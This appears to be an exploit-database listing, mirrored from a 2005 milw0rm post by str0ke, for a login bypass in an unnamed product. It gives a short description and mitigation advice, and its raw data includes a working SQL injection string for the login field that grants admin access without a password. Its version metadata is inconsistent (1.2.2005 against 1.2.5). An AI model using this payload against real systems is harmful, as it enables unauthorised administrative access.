header-logo
Suggest Exploit
vendor:
by:
str0ke
7.5
CVSS
HIGH
Login Bypass
CWE
Product Name:
Affected Version From: 1.2.2005
Affected Version To: 1.2.2005
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

Login Bypass vulnerability in version 1.2.5

The exploit allows an attacker to bypass the login process and gain administrative access by using a specially crafted login string. The vulnerability was tested on version 1.2.5.

Mitigation:

Update to a patched version of the software or implement proper input validation and access controls.
Source

Exploit-DB raw data:

# Tested with version 1.2.5 /str0ke

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)

# milw0rm.com [2005-03-21]

Navigation

Suggest Exploit

Services By CQR